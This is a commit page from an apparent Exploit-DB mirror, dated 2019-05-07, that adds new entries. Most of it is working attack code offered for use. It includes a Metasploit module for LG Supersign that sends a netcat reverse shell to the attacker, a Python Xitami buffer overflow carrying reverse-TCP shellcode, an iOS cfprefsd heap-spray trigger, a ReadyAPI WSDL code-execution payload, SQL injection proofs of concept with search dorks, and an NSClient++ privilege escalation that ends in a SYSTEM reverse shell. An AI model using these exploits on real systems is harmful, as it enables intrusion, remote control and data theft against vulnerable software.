bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-05-07

Browse source 
13 changes to exploits/shellcodes

iOS 12.1.3 - 'cfprefsd' Memory Corruption

Windows PowerShell ISE - Remote Code Execution
NSClient++ 0.5.2.35 - Privilege Escalation

Windows PowerShell ISE - Remote Code Execution
LG Supersign EZ CMS - Remote Code Execution (Metasploit)
Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter)
ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution
PHPads 2.0 - 'click.php3?bannerID' SQL Injection
microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection

Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)
Linux/x86 - shred file Shellcode (72 bytes)
This commit is contained in:
Offensive Security 2019-05-07 05:01:58 +00:00
parent 2ae6cf2b7f
commit 79a9df09f0
13 changed files with 831 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

28
exploits/asp/webapps/46799.txt Normal file
View file

@ -0,0 +1,28 @@
[+] Sql Injection on microASP (Portal+) CMS
[+] Date: 05/05/2019
[+] Risk: High
[+] CWE Number : CWE-89
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.microasp.it/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Gnu/Linux
[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;)
[+] Exploit :
http://host/patch/pagina.phtml?explode_tree= [SQL Injection]
[+] PoC :
https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-
https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] EOF

72
exploits/hardware/remote/46795.rb Executable file
View file

@ -0,0 +1,72 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'LG Supersign EZ CMS RCE',
'Description' => %q{
LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone
to remote code execution due to an improper parameter handling
},
'Author' => ['Alejandro Fanjul'],
'References' =>
[
[ 'CVE', '2018-17173' ],
[ 'URL', 'https://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Privileged' => false,
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_netcat'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 21 2018'
)
)
register_options(
[
OptString.new('RPORT',[true,'Target port','9080'])
], self.class)
end
def exploit
lhost=datastore['LHOST']
lport=datastore['LPORT']
#uri = target_uri.path
cmd = Rex::Text.uri_encode(payload.encoded)
connect
res = send_request_raw({
'method'=>'GET',
'uri'=>"/qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20"+lhost+"%20"+lport.to_s+"%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150"
})
handler
disconnect
end
end

2
exploits/hardware/webapps/46240.html
View file

@ -4,7 +4,7 @@
# Tested on: Windows 10 x64
# CVE : CVE-2019-6710
# Author : Ali Can Gönüllü
# Twitter : @god3err
# Twitter : @alicangonullu
Exploits :
-->

165
exploits/ios/dos/46803.c Normal file
View file

@ -0,0 +1,165 @@
// (c) 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes
// Intended only for educational and defensive purposes only.
// Use at your own risk.
#include <xpc/xpc.h>
#import <pthread.h>
#include <mach/mach.h>
#include <mach/task.h>
#include <dlfcn.h>
#include <mach-o/dyld_images.h>
#include <objc/runtime.h>
#define AGENT 1
#define FILL_DICT_COUNT 0x600
#define FILL_COUNT 0x1000
#define FREE_COUNT 0x2000
#define FILL_SIZE (0xc0)
int need_stop = 0;
struct heap_spray {
void* fake_objc_class_ptr;
uint32_t r10;
uint32_t r4;
void* fake_sel_addr;
uint32_t r5;
uint32_t r6;
uint64_t cmd;
uint8_t pad1[0x3c];
uint32_t stack_pivot;
struct fake_objc_class_t {
char pad[0x8];
void* cache_buckets_ptr;
uint32_t cache_bucket_mask;
} fake_objc_class;
struct fake_cache_bucket_t {
void* cached_sel;
void* cached_function;
} fake_cache_bucket;
char command[32];
};
void fill_once(){
#if AGENT
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
#else
xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
#endif
xpc_connection_set_event_handler(client, ^void(xpc_object_t response) {
xpc_type_t t = xpc_get_type(response);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));
need_stop = 1 ;
}
//printf("received an event\n");
});
xpc_connection_resume(client);
xpc_object_t main_dict = xpc_dictionary_create(NULL, NULL, 0);
xpc_object_t arr = xpc_array_create(NULL, 0);
xpc_object_t spray_dict = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(spray_dict, "CFPreferencesOperation", 8);
xpc_dictionary_set_string(spray_dict, "CFPreferencesDomain", "xpc_str_domain");
xpc_dictionary_set_string(spray_dict, "CFPreferencesUser", "xpc_str_user");
char key[100];
char value[FILL_SIZE];
memset(value, "A", FILL_SIZE);
*((uint64_t *)value) = 0x4142010180202020;
//*((uint64_t *)value) = 0x180202020;
value[FILL_SIZE-1]=0;
for (int i=0; i<FILL_DICT_COUNT; i++) {
sprintf(key, "%d",i);
xpc_dictionary_set_string(spray_dict, key, value);
}
//NSLog(@"%@", spray_dict);
for (uint64_t i=0; i<FILL_COUNT; i++) {
xpc_array_append_value(arr, spray_dict);
}
xpc_dictionary_set_int64(main_dict, "CFPreferencesOperation", 5);
xpc_dictionary_set_value(main_dict, "CFPreferencesMessages", arr);
void* heap_spray_target_addr = (void*)0x180202000;
struct heap_spray* map = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
memset(map, 0, 0x1000);
struct heap_spray* hs = (struct heap_spray*)((uint64_t)map + 0x20);
//hs->null0 = 0;
hs->cmd = -1;
hs->fake_objc_class_ptr = &hs->fake_objc_class;
hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
hs->fake_objc_class.cache_bucket_mask = 0;
hs->fake_sel_addr = &hs->fake_cache_bucket.cached_sel;
// nasty hack to find the correct selector address
hs->fake_cache_bucket.cached_sel = 0x7fff00000000 + (uint64_t)NSSelectorFromString(@"dealloc");
hs->fake_cache_bucket.cached_function = 0xdeadbeef;
size_t heap_spray_pages = 0x40000;
size_t heap_spray_bytes = heap_spray_pages * 0x1000;
char* heap_spray_copies = malloc(heap_spray_bytes);
for (int i = 0; i < heap_spray_pages; i++){
memcpy(heap_spray_copies+(i*0x1000), map, 0x1000);
}
xpc_dictionary_set_data(main_dict, "heap_spray", heap_spray_copies, heap_spray_bytes);
//NSLog(@"%@", main_dict);
xpc_connection_send_message(client, main_dict);
printf("fill once\n");
xpc_release(main_dict);
}
void trigger_vul(){
#if AGENT
printf("AGENT\n");
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0);
#else
printf("DAEMON\n");
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
#endif
xpc_connection_set_event_handler(conn, ^(xpc_object_t response) {
xpc_type_t t = xpc_get_type(response);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION));
need_stop = 1 ;
}
});
xpc_connection_resume(conn);
xpc_object_t hello = xpc_dictionary_create(NULL, NULL, 0);
xpc_object_t arr = xpc_array_create(NULL, 0);
xpc_object_t arr_free = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(arr_free, "CFPreferencesOperation", 4);
xpc_array_append_value(arr, arr_free);
for (int i=0; i<FREE_COUNT; i++) {
xpc_object_t arr_elem1 = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(arr_elem1, "CFPreferencesOperation", 20);
xpc_array_append_value(arr, arr_elem1);
}
//printf("%p, %p\n", arr_elem1, hello);
xpc_dictionary_set_int64(hello, "CFPreferencesOperation", 5);
xpc_dictionary_set_value(hello, "CFPreferencesMessages", arr);
//NSLog (@"%@", hello);
fill_once();
xpc_connection_send_message(conn, hello);
NSLog(@" trigger vuln");
xpc_release(hello);
}
int main(int argc, const char * argv[]) {
pthread_t fillthread1,triger_thread;
NSLog(@"start to trigger..");
trigger_vul();
return 0;
}

96
exploits/multiple/webapps/46796.txt Normal file
View file

@ -0,0 +1,96 @@
<!--
# Exploit Title: ReadyAPI Remote Code Execution Vulnerability.
# Date: May, 2019
# Exploit Author: Gilson Camelo => https://twitter.com/gscamelo
# Vendor Homepage: https://smartbear.com/product/ready-api
# Software Link: https://smartbear.com/product/ready-api/overview/
# Github: https://github.com/gscamelo/CVE-2018-20580
# Version: 2.5.0 and 2.6.0
# Tested on: Windows
# CVE : CVE-2018-20580
I found a new vulnerability in the (ReadyAPI). It allows an attacker to
execute a remote code on the local machine putting in danger the ReadyAPI
users including developers, pentesters, etc...
The ReadyAPI allows users to open a SOAP project and import WSDL files that
help the users to communicate with the remote server easily.
The WSDL file owner can determine default values of some parameters. An
attacker can impersonate a legitimate web service and inject a malicious
code into a default value of one of the parameters and spread it to
ReadyAPI clients.
When a ReadyAPI client load a malicious WSDL file to his project and send a
request containing the malicious code the ReadyAPI will execute the
malicious code on the victim's computer.
The attack scenario:
An attacker impersonates a regular web service with a WSDL containing the
malicious code.
The victim creates a new project in the ReadyAPI and loads the malicious
WSDL File.
The victim decides to send a request to the remote server and the ReadyAPI
execute the malicious code.
The attacker succeeds in executing malicious code in the victim's machine
and take it over.
-->
<?xml version="1.0" encoding="UTF-8"?>
<wsdl:definitions
xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"
xmlns:tns="http://example.com/stockquote.wsdl"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:s="http://www.w3.org/2001/XMLSchema"
xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"
targetNamespace="http://example.com/stockquote.wsdl"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">
<wsdl:types>
<s:schema elementFormDefault="qualified" targetNamespace="http://example.com/stockquote.wsdl">
<s:element name="Malicious_Request">
<s:complexType>
<s:sequence>
<s:element name="Payload" default="PWNED" type="s:string" />
</s:sequence>
</s:complexType>
</s:element>
</s:schema>
</wsdl:types>
<wsdl:message name="Malicious_RequestSoapIn">
<wsdl:part name="parameters" element="tns:Malicious_Request" />
</wsdl:message>
<wsdl:portType name="Exploit">
<wsdl:operation name="Malicious_Request">
<wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">Create a new xpl</wsdl:documentation>
<wsdl:input message="tns:Malicious_RequestSoapIn" />
<wsdl:output message="tns:Malicious_RequestSoapOut" />
</wsdl:operation>
</wsdl:portType>
<wsdl:binding name="Exploit" type="tns:Exploit">
<soap:binding transport="http://schemas.xmlsoap.org/soap/http" />
<wsdl:operation name="Malicious_Request">
<soap:operation soapAction="https://www.test.com.br/Malicious_Request" style="document" />
<wsdl:input>
<soap:body use="literal" />
</wsdl:input>
<wsdl:output>
<soap:body use="literal" />
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:service name="XPL">
<wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">My first Exploit</wsdl:documentation>
<wsdl:port name="Exploit" binding="tns:Exploit">
<soap:address location="http%3A%2F%2F127.0.0.1%2F%24%7B%3DRuntime.getRuntime%28%29.exec%28%27calc.exe%27%29%7D%3B" />
</wsdl:port>
</wsdl:service>
</wsdl:definitions>

56
exploits/php/webapps/46798.txt Normal file
View file

@ -0,0 +1,56 @@
[+] Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores
[+] Date: 05/05/2019
[+] Risk: High
[+] CWE Number : CWE-89
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: https://blondish.net/
[+] Software Demo : https://github.com/blondishnet/PHPads/blob/master/readme.txt
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Gnu/Linux
[+] Dork: inurl:"click.php3?bannerID="" // use your brain ;)
[+] Exploit :
http://host/patch//click.php3?bannerID= [SQL Injection]
[+] Vulnerable File :
<?php
$bannerAdsPath = './ads.dat';
require './ads.inc.php';
///////////////////////////////////////
// Don't Edit Anything Below This Line!
///////////////////////////////////////
for ($i = 0; $i < count($ads); $i++) {
if(ereg('^' .$_GET['id']. '\|\|', $ads[$i])) {
$data = explode('||', $ads[$i]);
if ($_SERVER['REMOTE_ADDR'] != $bannerAds['blockip']) {
$data[ PHPADS_ADELEMENT_CLICKTHRUS ]++;
}
$ads[$i] = join('||', $data);
break;
}
}
if (!$data[PHPADS_ADELEMENT_LINK_URI]) {
die();
}
writeads();
Header("Location: ". $data[PHPADS_ADELEMENT_LINK_URI]);
exit;
?>
[+] PoC :
http://server/phpads/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
http:/server/phpAds/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] EOF

63
exploits/windows/local/46802.txt Normal file
View file

@ -0,0 +1,63 @@
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64
Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.
The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation. A reboot, as far as I can tell, is required to reload and read the changes to the web config.
Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.
Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
C:\Program Files\NSClient++>nscp web -- password --display
Current password: SoSecret
2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler
3. Download nc.exe and evil.bat to c:\temp from attacking machine
@echo off
c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe
4. Setup listener on attacking machine
nc -nlvvp 443
5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
- foobar
command = c:\temp\evil.bat
6. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
- foobar
interval = 1m
command = foobar
7. Restart the computer and wait for the reverse shell on attacking machine
nc -nlvvp 443
listening on [any] 443 ...
connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
Microsoft Windows [Version 10.0.17134.753]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System

0
exploits/windows/local/46790.txt → exploits/windows/remote/46790.txt
View file

125
exploits/windows/remote/46797.py Executable file
View file

@ -0,0 +1,125 @@
# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter)
# Date: May 4, 2019
# Author: ElSoufiane
# Version: 2.5b4
# Tested on: Windows Vista Ultimate (Build 6000) and Windows XP SP3 Professional
# Discovered by: Krystian Kloskowski
#
# Set up a multi handler listener in MSFConsole
# then run exploit
#
# root@f6c9fa91b403:~/XitamiWebServer# python exploit.py 192.168.1.149
# [+] Sending exploit payload...
#
# Check the MSFConsole listener
#
# msf5 exploit(multi/handler) > run
# [*] Started reverse TCP handler on 0.0.0.0:5801
# [*] Encoded stage with x86/shikata_ga_nai
# [*] Sending encoded stage (267 bytes) to 172.17.0.1
# [*] Command shell session 6 opened (172.17.0.2:5801 -> 172.17.0.1:39416) at 2019-05-04 00:17:55 +0000
# C:\Xitami>
import socket
import sys
import struct
if len(sys.argv) != 2 :
print "[+] Usage : python exploit.py [VICTIM_IP]"
exit(0)
TCP_IP = sys.argv[1]
TCP_PORT = 80
egg = "SOUFSOUF"
nops = "\x90"*10
#msfvenom -p windows/shell/reverse_tcp LPORT=5801 LHOST=192.168.1.129 -f python -v shellcode -e x86/alpha_mixed
shellcode = "\x89\xe0\xd9\xe5\xd9\x70\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x68\x68\x6c\x42\x63\x30\x37\x70\x63\x30"
shellcode += "\x51\x70\x6b\x39\x6d\x35\x70\x31\x6f\x30\x70\x64"
shellcode += "\x4e\x6b\x76\x30\x70\x30\x4e\x6b\x76\x32\x54\x4c"
shellcode += "\x6e\x6b\x72\x72\x46\x74\x6c\x4b\x53\x42\x55\x78"
shellcode += "\x34\x4f\x4e\x57\x42\x6a\x35\x76\x30\x31\x59\x6f"
shellcode += "\x4e\x4c\x77\x4c\x70\x61\x31\x6c\x75\x52\x34\x6c"
shellcode += "\x35\x70\x6b\x71\x38\x4f\x56\x6d\x47\x71\x4a\x67"
shellcode += "\x4a\x42\x49\x62\x63\x62\x63\x67\x6e\x6b\x63\x62"
shellcode += "\x52\x30\x4c\x4b\x53\x7a\x77\x4c\x6e\x6b\x70\x4c"
shellcode += "\x72\x31\x31\x68\x59\x73\x30\x48\x53\x31\x68\x51"
shellcode += "\x72\x71\x4e\x6b\x30\x59\x57\x50\x55\x51\x6e\x33"
shellcode += "\x4c\x4b\x73\x79\x72\x38\x48\x63\x56\x5a\x62\x69"
shellcode += "\x4c\x4b\x66\x54\x6c\x4b\x73\x31\x49\x46\x64\x71"
shellcode += "\x4b\x4f\x6c\x6c\x5a\x61\x68\x4f\x66\x6d\x77\x71"
shellcode += "\x69\x57\x30\x38\x4b\x50\x74\x35\x58\x76\x55\x53"
shellcode += "\x71\x6d\x6b\x48\x55\x6b\x73\x4d\x44\x64\x32\x55"
shellcode += "\x4a\x44\x43\x68\x4c\x4b\x70\x58\x31\x34\x65\x51"
shellcode += "\x4a\x73\x62\x46\x4e\x6b\x54\x4c\x52\x6b\x6e\x6b"
shellcode += "\x33\x68\x37\x6c\x43\x31\x4b\x63\x6e\x6b\x34\x44"
shellcode += "\x6c\x4b\x43\x31\x4a\x70\x4c\x49\x37\x34\x37\x54"
shellcode += "\x44\x64\x51\x4b\x73\x6b\x53\x51\x52\x79\x52\x7a"
shellcode += "\x42\x71\x6b\x4f\x69\x70\x71\x4f\x43\x6f\x32\x7a"
shellcode += "\x4c\x4b\x37\x62\x7a\x4b\x4e\x6d\x71\x4d\x55\x38"
shellcode += "\x56\x53\x70\x32\x77\x70\x65\x50\x62\x48\x44\x37"
shellcode += "\x42\x53\x74\x72\x63\x6f\x43\x64\x33\x58\x42\x6c"
shellcode += "\x63\x47\x31\x36\x54\x47\x6d\x59\x6b\x58\x69\x6f"
shellcode += "\x4e\x30\x4e\x58\x4c\x50\x67\x71\x47\x70\x67\x70"
shellcode += "\x37\x59\x4a\x64\x31\x44\x56\x30\x70\x68\x55\x79"
shellcode += "\x4f\x70\x30\x6b\x63\x30\x6b\x4f\x68\x55\x61\x7a"
shellcode += "\x35\x5a\x72\x48\x39\x50\x79\x38\x45\x51\x4f\x71"
shellcode += "\x52\x48\x46\x62\x43\x30\x32\x36\x39\x39\x6c\x49"
shellcode += "\x59\x76\x36\x30\x46\x30\x36\x30\x32\x70\x51\x50"
shellcode += "\x36\x30\x67\x30\x76\x30\x32\x48\x6a\x4a\x56\x6f"
shellcode += "\x79\x4f\x39\x70\x59\x6f\x79\x45\x5a\x37\x70\x6a"
shellcode += "\x46\x70\x71\x46\x63\x67\x30\x68\x6e\x79\x69\x35"
shellcode += "\x44\x34\x30\x61\x59\x6f\x59\x45\x6d\x55\x49\x50"
shellcode += "\x53\x44\x55\x5a\x79\x6f\x30\x4e\x66\x68\x53\x45"
shellcode += "\x6a\x4c\x6a\x48\x52\x47\x73\x30\x33\x30\x73\x30"
shellcode += "\x61\x7a\x55\x50\x33\x5a\x67\x74\x71\x46\x66\x37"
shellcode += "\x62\x48\x45\x52\x68\x59\x4f\x38\x51\x4f\x59\x6f"
shellcode += "\x6b\x65\x4f\x73\x7a\x58\x53\x30\x63\x4e\x57\x46"
shellcode += "\x4c\x4b\x35\x66\x32\x4a\x63\x70\x72\x48\x63\x30"
shellcode += "\x76\x70\x65\x50\x77\x70\x73\x66\x62\x4a\x37\x70"
shellcode += "\x32\x48\x46\x38\x4e\x44\x76\x33\x79\x75\x79\x6f"
shellcode += "\x5a\x75\x6e\x73\x76\x33\x52\x4a\x73\x30\x76\x36"
shellcode += "\x42\x73\x32\x77\x33\x58\x45\x52\x78\x59\x78\x48"
shellcode += "\x61\x4f\x39\x6f\x59\x45\x4d\x53\x49\x68\x45\x50"
shellcode += "\x73\x4d\x61\x38\x71\x48\x62\x48\x55\x50\x53\x70"
shellcode += "\x35\x50\x53\x30\x33\x5a\x45\x50\x76\x30\x33\x58"
shellcode += "\x56\x6b\x34\x6f\x46\x6f\x34\x70\x4b\x4f\x78\x55"
shellcode += "\x71\x47\x75\x38\x31\x65\x70\x6e\x52\x6d\x50\x61"
shellcode += "\x4b\x4f\x79\x45\x33\x6e\x31\x4e\x4b\x4f\x44\x4c"
shellcode += "\x76\x44\x56\x6f\x4e\x65\x72\x50\x79\x6f\x69\x6f"
shellcode += "\x6b\x4f\x68\x69\x4d\x4b\x79\x6f\x79\x6f\x49\x6f"
shellcode += "\x56\x61\x5a\x63\x71\x39\x69\x56\x51\x65\x69\x51"
shellcode += "\x4f\x33\x6d\x6b\x5a\x50\x68\x35\x4e\x42\x50\x56"
shellcode += "\x52\x4a\x57\x70\x36\x33\x69\x6f\x5a\x75\x41\x41"
egghunter ="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"+"SOUF"+"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
nseh_jmp = "\xeb\xaa" #jmp back 84 bytes
seh = "\x87\x1d\x40" # (xiwin32.exe) 0x00401d87 -> pop/pop/ret. ( Parial Overwrite )
payload = "A"*120
payload += egghunter
payload += "A"*(190-len(payload))
payload += nseh_jmp
payload += seh
http_req = "GET / HTTP/1.1\r\n"
http_req += "Host: "+ TCP_IP +"\r\n"
http_req += "User-Agent: "+egg+nops+shellcode+"\r\n"
http_req += "If-Modified-Since: Wed, " + payload + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."
s.send(http_req)
s.close()

9
files_exploits.csv
View file

@ -6408,6 +6408,7 @@ id,file,description,date,author,type,platform,port
46778,exploits/windows/dos/46778.py,"SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)",2019-04-30,"Victor Mondragón",dos,windows,
46781,exploits/linux/dos/46781.txt,"Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification",2019-04-30,"Google Security Research",dos,linux,
46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows,
46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10451,7 +10452,7 @@ id,file,description,date,author,type,platform,port
46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows,
46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows,
46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows,
46790,exploits/windows/local/46790.txt,"Windows PowerShell ISE - Remote Code Execution",2019-05-03,hyp3rlinx,local,windows,
46802,exploits/windows/local/46802.txt,"NSClient++ 0.5.2.35 - Privilege Escalation",2019-05-06,bzyo,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17377,7 +17378,10 @@ id,file,description,date,author,type,platform,port
46782,exploits/windows/remote/46782.rb,"AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)",2019-04-30,Metasploit,remote,windows,
46783,exploits/php/remote/46783.rb,"Pimcore < 5.71 - Unserialize RCE (Metasploit)",2019-04-30,Metasploit,remote,php,
46785,exploits/linux/remote/46785.rb,"Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)",2019-05-02,Metasploit,remote,linux,3000
46790,exploits/windows/remote/46790.txt,"Windows PowerShell ISE - Remote Code Execution",2019-05-03,hyp3rlinx,remote,windows,
46792,exploits/linux/remote/46792.py,"Blue Angel Software Suite - Command Execution",2019-05-03,"Paolo Serracino_ Pietro Minniti_ Damiano Proietti",remote,linux,
46795,exploits/hardware/remote/46795.rb,"LG Supersign EZ CMS - Remote Code Execution (Metasploit)",2019-05-06,"Alejandro Fanjul",remote,hardware,9080
46797,exploits/windows/remote/46797.py,"Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter)",2019-05-06,ElSoufiane,remote,windows,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41224,3 +41228,6 @@ id,file,description,date,author,type,platform,port
46787,exploits/php/webapps/46787.txt,"Instagram Auto Follow - Authentication Bypass",2019-05-03,Veyselxan,webapps,php,
46788,exploits/multiple/webapps/46788.txt,"Zotonic < 0.47.0 mod_admin - Cross-Site Scripting",2019-05-03,"Ramòn Janssen",webapps,multiple,
46794,exploits/php/webapps/46794.py,"Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution",2019-05-03,hash3liZer,webapps,php,
46796,exploits/multiple/webapps/46796.txt,"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution",2019-05-06,"Gilson Camelo",webapps,multiple,
46798,exploits/php/webapps/46798.txt,"PHPads 2.0 - 'click.php3?bannerID' SQL Injection",2019-05-06,"felipe andrian",webapps,php,80
46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -961,3 +961,5 @@ id,file,description,date,author,type,platform
46746,shellcodes/generator/46746.txt,"Linux/x86 - Rabbit Shellcode Crypter (200 bytes)",2019-04-24,"Petr Javorik",shellcode,generator
46789,shellcodes/linux_x86/46789.txt,"Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper",2019-05-03,"Dave Sully",shellcode,linux_x86
